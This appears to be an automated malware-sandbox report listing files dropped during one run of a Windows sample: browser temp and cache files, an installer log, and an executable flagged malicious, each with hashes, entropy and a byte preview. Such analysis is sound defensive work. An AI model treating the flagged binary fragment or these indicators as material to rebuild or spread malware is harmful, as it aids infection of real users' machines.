sQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fd6aaf08-fbf2-445f-aa92-45d472393e64.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	45873
Entropy (8bit):	6.089287991982296
Encrypted:	false
SSDEEP:	768:LMkbJrT8IeQc5D9WgUXqgfbvDDCTp+R+JD0a9N2aPICvo2QYqGwLWZkHUfG671:LMk1rT8Hb9U3Dk98aPIaocqfyW0e6h
MD5:	751D7C0216B323D82A02C485B83F5656
SHA1:	A88EEBD58F26F21B2A5FEB1AE38D31BAC5E30D6D
SHA-256:	4D26D3CF289BE62008AB8B2D0A3B33CAF775718B5FF3CF5896D27C466901E56D
SHA-512:	0082C7FE052BAAF6B355943D757D9B2BE83D4FB1A11F4E662D5E24AA582175204338CBE2D00FD4BFD089EB99968C109EB91FA0327C6CB47CF6B4BBBBE2631252
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"7be0de29-7e58-449b-a272-7c2a271faad3"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736430971"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.851836949759822
Encrypted:	false
SSDEEP:	48:uiTrlKxrgx0xl9Il8uVuaaJlqigjtraAZCETd1rc:m5YX4lqtjroN
MD5:	330BA0954AD705A4CC9AE22170625FF9
SHA1:	C4BECA42638BB0A7FA9F58938D61F4874F65941B
SHA-256:	09F63393C10F02EAE2D9A68DD5C7AE62FFC77569A6755009962602C38A7F339B
SHA-512:	563887E05DF04DB9C624049704A40BE817B775444E3D0F317D2B82A03C1DE8C713983D09235233A658E3F3513665A093F35DE9C59147B63A54AC115D2AAFBED3
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.C.F.z.n.q.Z.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.u.s.0.R.f.b.

C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.002011675956849
Encrypted:	false
SSDEEP:	96:gYXH0mbGt7OugPpCjZmjhjCgFAF2eXohY6Av9:gjH7HZmjFSehYz
MD5:	BF40904C615BC3E51F08D29098F74F27
SHA1:	BD68B07649C99788F3482D5847C4F01F27589A62
SHA-256:	FAA144E2FF9BBD1F1195FC4965740F58810223FC596E53D3BB823CC108EED97F
SHA-512:	F79D714AD1BEE496841240B6A92B8F8401CC9BFBB39C776A00EEA01366C41C6B11A055388DA7403FABDB5D36C665BC0D26209F07BCC8DD2DBB00C9B8FD01C2DC
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".S.F.c.0.h.J.5.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.u.s.0.R.f.b.

C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.9152767630678955
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7x5xl9Il8uVuaW8aCcIInj7uWgtwulGd/vc:aXYXW8ePjilB
MD5:	507900DF42C102217238D7ABEF33EE4D
SHA1:	953EC50FC34A104555659D6D31FEA3D3019851B6
SHA-256:	231CD9F782E64F8BA19281E97AC3B38121705ECD11360C50C29AD00E3463ECA1
SHA-512:	0DE9E943A06C40CA0057493AB90A48273842FD3C22FAE83D59D18B34F6270E889997735642397342C4379D1976F3BDF57A6A0776567FF35787B15808C19B70E6
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Y.t.G.B.t.G.+.B.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.u.s.0.R.f.b.

C:\Users\user\AppData\Local\Temp\0a71a915-14b6-425a-a24d-fbd63f235b33.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\387b6126-812f-46b3-9eab-dce4a797b89d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\4df76314-0f7e-4200-8190-ec14b64ba45a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\5af695b7-ddb1-4a68-a560-4ea64e1dffef.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\8433d50f-7daf-4b21-bbab-ba451d3bf914.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\8f4095c2-9f8a-4d7c-82dd-fa95003e500a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
Category:	dropped
Size (bytes):	76326
Entropy (8bit):	7.9961120748813075
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
MD5:	01E352D35675990A139199DD86B38AAC
SHA1:	E16163C81E5F36B3B819AA0A63BFA63D88548A91
SHA-256:	148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
SHA-512:	75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\Hebephrenia_20250109085448.log

Download File

Process:	C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	979
Entropy (8bit):	5.4693803993178935
Encrypted:	false
SSDEEP:	24:dtN6bAIeLLzf+tNmntN6cP2ltN6cP25ticP236jOpticP2sHticP23hv:XNMxYfENGNlUNlMtw68tlNtOv
MD5:	8E5B184384519436BBAAA2854075FAB3
SHA1:	1C72212E06BF46D905974B179BA5275659B8042F
SHA-256:	6ACFE98F598D37D90574467E7D113F3AE5E8ABB822241CC1253F8E2DC8EE6AD6
SHA-512:	D297E038C849C727E0E33C131F4C2D97ACC2C6AD3104646C2664607B4F06BE506D23E969B6F4D057BDFF26C70D974D3FB6C7FE897DD3688C1826CC2239629336
Malicious:	false
Preview:	[1EC4:1EF0][2025-01-09T08:54:46]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe..[1EC4:1EF0][2025-01-09T08:54:46]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\24EPV9vjc5.exe -burn.filehandle.attached=676 -burn.filehandle.self=520'..[1EC4:1EF0][2025-01-09T08:54:46]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\24EPV9vjc5.exe'..[1EC4:1EF0][2025-01-09T08:54:46]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1EC4:1EF0][2025-01-09T08:54:48]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Hebephrenia_20250109085448.log'..[1EC4:1EF0][2025-01-09T08:54:48]i000: Setting string variable 'WixBundleName' to value 'Hebephrenia'..[1EC4:1EF0][2025-01-09T08:54:48]i000: Setting string variable 'WixBundleManufacturer' to value 'Windlestraw'..

C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2364728
Entropy (8bit):	6.606009669324617
Encrypted:	false
SSDEEP:	49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
MD5:	967F4470627F823F4D7981E511C9824F
SHA1:	416501B096DF80DDC49F4144C3832CF2CADB9CB2
SHA-256:	B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
SHA-512:	8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: VmjvNTbD5J.exe, Detection: malicious, Browse Filename: 1wrLmYiC62.exe, Detection: malicious, Browse Filename: 8Rmoal0v85.exe, Detection: malicious, Browse Filename: K3UtwU3CH9.msi, Detection: malicious, Browse Filename: VmjvNTbD5J.exe, Detection: malicious, Browse Filename: 1wrLmYiC62.exe, Detection: malicious, Browse Filename: vV5EOx0ipU.exe, Detection: malicious, Browse Filename: kXzODlqJak.exe, Detection: malicious, Browse Filename: 8Rmoal0v85.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o\|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................\|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c2a1df15

Download File

Process:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	5698949
Entropy (8bit):	7.729513398191851
Encrypted:	false
SSDEEP:	98304:VBr1SV1sx0n/OBmMPsOloNEJ1TQwyOWnEr3CjiVe3m7fmqUKzhXOt1kTjl/SMCJ6:VBJMgbPHMEJ1PyTnu3CWVQQfm9KzFOTs
MD5:	836E17A0D0AC2FE0ABC49AE20C58E68F
SHA1:	36C58713B42850B6A0EA291274210C6E8247C7E9
SHA-256:	C5F79CDBE134FE8E79E59D1596CECEE72FEC1AFE1A663C1C797430253EE9C6D7
SHA-512:	61D9EB65C9F35D49EAEFEB5A68910CA8C93D5580BA1080982CDB9BDBE0906BB3E2EC42AB03A17BB08B177CB507FA72659B9059DB73CB2218D7F0D49F79CA8038
Malicious:	false
Preview:	f..d..e..e..d..A..q..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!..@.........2.....6...............6......e..e..e..e..e..e..e..e..e..e..e..&......... ...e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..&......,.....e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!...9......... ........e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e......K...W...e..e..e..e..e..e..e..e..e..e..

C:\Users\user\AppData\Local\Temp\c7b0c819-0648-4044-999a-1945232aedc5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1584258
Entropy (8bit):	7.992581298199788
Encrypted:	true
SSDEEP:	49152:rUUqd2bO3GurkFhuAddpzW3CKZlJxOvHAbZ:wU02b4Gv7XddpzKC4JgvA1
MD5:	431DBCD489D33A91DC66E62AAACD20FB
SHA1:	12527B603F126D3DF1D0C7AD5E2C378ACE651BAF
SHA-256:	A7B2B58B1345FC23826A8BAAE17BAD158F389A0EB4311C8705A7421A3318A3B1
SHA-512:	18735F9F9E448D809F6192B6840EBED5EF2266A6FAA3731088230CA693C217EC0CD166F1D48DBD343A177F79A1BDAD40AADCAFF5CEA86F48FBF07177359A6CC6
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.427981922490733
Encrypted:	false
SSDEEP:	24:Yac54VJfe54V80NBgu5SBxK0Npm25Spe0TxqXIp5r7qJ0Hg5NXX0qmu5M:Yac5oJG5o807d54xK07m25Ee0TxqXIph
MD5:	A54165BDD68A83C2311CE470D169C80E
SHA1:	DCE2B7F257D47063B1A166F4D7196D646050DAFC
SHA-256:	3AA649854DB4A8FE812BEFC1183FC2F14C0D1649E3BE955FE73D684C21B256C3
SHA-512:	3304A3F8A43762680FE8F903A16A7874DE2733A05293163A7CC8CD20E3DE78A1B1009A0862D8E6ACE8923107C650E7B7BA7AF38FBCC3EE8F8791BF5DA9AEB4CA
Malicious:	false
